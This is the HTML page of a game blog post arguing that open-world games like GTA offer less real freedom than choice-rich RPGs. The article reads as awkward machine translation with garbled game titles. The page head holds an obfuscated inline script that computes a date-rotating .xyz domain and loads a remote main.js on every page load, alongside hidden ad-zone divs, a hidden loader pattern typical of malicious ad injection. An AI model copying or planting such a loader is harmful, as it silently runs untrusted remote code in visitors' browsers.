<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="Looking at the current 3A stand-alone works, it seems that with a huge map of the open world has become a standard configuration. We can explore the world through various ways provided in the game, an">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Where you want to go is not enough. What kind of game is high degree of freedom">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="Looking at the current 3A stand-alone works, it seems that with a huge map of the open world has become a standard configuration. We can explore the world through various ways provided in the game, an">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/93f16e55a022438d8089a9e42768c7e8.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/373065498cae4b2996d1a4e2280b6e60.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/0c79671112014448877581b625edffe5.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/2d3ad0065f4f41de99ba7968fb7dc7f1.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/d89358dc268b4dbc9d3d8f00c03c62c8.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/379a12cfcbfe4751a544c391ac8c1884.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/3ec6dc6af78f4012828e9fb41fe83ae9.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:50.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Where you want to go is not enough. What kind of game is high degree of freedom">
<meta name="twitter:description" content="Looking at the current 3A stand-alone works, it seems that with a huge map of the open world has become a standard configuration. We can explore the world through various ways provided in the game, an">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/93f16e55a022438d8089a9e42768c7e8.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Where you want to go is not enough. What kind of game is high degree of freedom | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Where you want to go is not enough. What kind of game is high degree of freedom</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Looking at the current 3A stand-alone works, it seems that with a huge map of the open world has become a standard configuration. We can explore the world through various ways provided in the game, and at the same time, we can do anything we want to do. For example, in the action game GTA, we can loot other passers-by’s vehicles at will, try to parachute between the buildings in the city, and drive the tank to bomb the streets. For the players, this kind of play is enough to let them fly.<br><img src="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/93f16e55a022438d8089a9e42768c7e8.jpg" alt="Where you want to go is not enough. What kind of game is high degree of freedom"><br>But many people can feel that although they can explore at will in these mainstream open world games and can do a lot of things, it seems that players can experience the game at will, but in fact, the freedom that can be provided for players in the game is far from being called “freedom”.<br>We may recall that in most open world games, they are usually divided into “task state” and “roaming state”. When undertaking tasks, most of the games can only be played according to the requirements given by the tasks, but the games that we really want to play at will can only be played outside the tasks. However, if we don’t do the tasks, we can’t advance the process of the game. So it seems that the Can the feeling of “leading the nose” really be called “freedom”?</p>
<p>#How to define high degrees of freedom?<br>The freedom of a game depends on the self orientation of the game. Take racing game as an example. If the playing method of the game is always a traditional racing game that only brushes circles in a fixed field, then obviously there is no freedom in the game. But if it is an open map, a race can not only drive smoothly according to the route, but also can break away from the open world racing game of how fast and how to open the track, then the freedom of the latter is obvious However, it is higher than the former; if on this basis, the user-defined modification system and collision system are added to allow players to install rain tires to the vehicle in sunny days, or directly crash the opponent to gain an advantage for themselves, then the playability can be upgraded to a higher level.<br><img src="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/373065498cae4b2996d1a4e2280b6e60.jpg" alt="Where you want to go is not enough. What kind of game is high degree of freedom"><br>It’s true that it’s OK to make a game with the first orientation, but compared with these examples, it’s obvious that the design of the last one should be more attractive. The playing method of racing game is nothing more than the posture vehicle flying on the road, neither flying nor launching, and if a game is made according to the above design, it can also be called “high degree of freedom”. All in all, the definition of freedom is not how open the game world is, but how many “options” can be provided to players. In terms of loading rain tires on a sunny day, it’s obviously meaningless to do so. Naturally, players will not be encouraged to do so in the game. However, the game only provides players with such conditions and gives them the right to choose. Whether or not to do so is completely the “freedom” of players, which is the expression of high degree of freedom.<br><img src="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/0c79671112014448877581b625edffe5.jpg" alt="Where you want to go is not enough. What kind of game is high degree of freedom"><br>Let’s take another look at other types of games on the market. Take action games for example. As mentioned above, most open world action games are seemingly free, but in fact, your every move is under the control of the game. For example, in GTA, when you do a task, you will be asked where to go, what to do, and how to do it. Players will always follow the guidance of the task, and if you don’t, the task will fail. Although the design of these tasks is wonderful and comparable to a blockbuster, all these are planned by the developers. The only free option provided by the game for the players is to choose what vehicles and routes they can take when they go to the task location.<br><img src="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/2d3ad0065f4f41de99ba7968fb7dc7f1.jpg" alt="Where you want to go is not enough. What kind of game is high degree of freedom"><br>GTA and its core lie in its wonderful task design and plot performance, which creates a high immersion experience for the players, while the content outside any task is only the core foil. Think carefully, the world of GTA is like a patchwork of many large and small linear checkpoints, because their story needs such a big world, so they did so In a big world, GTA’s freedom is not high.</p>
<h1 id="which-games-are-considered-as-“high-degree-of-freedom”"><a href="#which-games-are-considered-as-“high-degree-of-freedom”" class="headerlink" title="which games are considered as “high degree of freedom”?"></a>which games are considered as “high degree of freedom”?</h1><p>With the most easy to understand explanation, the so-called “high freedom game” is “a game with many choices”. One might ask, are text adventures or interactive movie games with only text or options free enough? When we dissect these games, the options provided to players in these games are all pre-designed processes by developers. Even though there are many kinds of options, they are still not separated from the developers’ planning. Therefore, the simple choice is not “high degree of freedom”. Of course, “choice” is not only reflected in the explicit aspect of letting players do the choice, but also in combination with different factors The type of game to determine the level of freedom.<br><img src="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/d89358dc268b4dbc9d3d8f00c03c62c8.jpg" alt="Where you want to go is not enough. What kind of game is high degree of freedom"><br>My favorite ARPG game “horse riding and killing” is a game with high degree of freedom. The game provides a rather complex character growth system for the players. What kind of character they want to become depends on the players’ own orientation. At the same time, the mission system of the game is very weak. If there is no “script” (game system, you can design the game stream by yourself In the case of Cheng), there are almost no tasks to talk about. Players can be soldiers who want to become stronger, or bandits who commit crimes everywhere. The whole game world is players’ playground, and they can play as they want. When they grow up to a certain extent, the whole game mode becomes a simulation operation or even a strategy game, which leads soldiers to attack cities To be a king of a country is not a dream.<br><img src="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/379a12cfcbfe4751a544c391ac8c1884.jpg" alt="Where you want to go is not enough. What kind of game is high degree of freedom"><br>The same design is also reflected in many old American RPG Games and nostalgic CRPG games, such as “door of Bode”, “radiation”, “divine kingdom” series, etc. these games also promote the game process by completing tasks, but usually only give players a goal, and how to do it needs players to explore.<br>For a simple example, you need to get a prop. The prop is locked in a room, and the key of the door is on an NPC. That’s all the information. You can choose to bribe NPC to give you the key, or kill NPC to get the key, or try to pry the door open, or smash the door directly, or even use props and skills to transfer yourself directly to the room. There are so many ways to carry out such a simple task, but the game will never provide suggestions and Guidance, how to proceed is entirely up to the player to choose.<br><img src="http://maiygu.xyz/2019/11/08/Where you want to go is not enough. What kind of game is high degree of freedom/3ec6dc6af78f4012828e9fb41fe83ae9.jpg" alt="Where you want to go is not enough. What kind of game is high degree of freedom"><br>    concluding remarks<br>There are many other games like this. I won’t go over them one by one here. All these games have a common player because their system is deep enough to encourage the players to think independently, which is incomprehensible for the players who are used to playing simple and direct rough games. For them, deep thinking is a kind of torture.<br>This also reflects a phenomenon from the side: why do teenagers have rebellious period? One of the main reasons is that the elders give too few choices, sometimes even only one way to choose. This kind of rebellion, though not respected, can be understood, because the pursuit of diversity of choice is human nature, but also the nature of all creatures. From an evolutionary point of view, it’s because of the diversity of choices that life blooms such colorful fireworks.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/When the traditional style is not satisfied with the new formula, why is the word-of-mouth of ghost action breakpoint broken/" rel="next" title="When the traditional style is not satisfied with the new formula, why is the word-of-mouth of ghost action breakpoint broken">
                <i class="fa fa-chevron-left"></i> When the traditional style is not satisfied with the new formula, why is the word-of-mouth of ghost action breakpoint broken
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Verify the theory of reality in the virtual world and simulate the glorious years of Maxis/" rel="prev" title="Verify the theory of reality in the virtual world and simulate the glorious years of Maxis">
                Verify the theory of reality in the virtual world and simulate the glorious years of Maxis <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#which-games-are-considered-as-“high-degree-of-freedom”"><span class="nav-number">1.</span> <span class="nav-text">which games are considered as “high degree of freedom”?</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
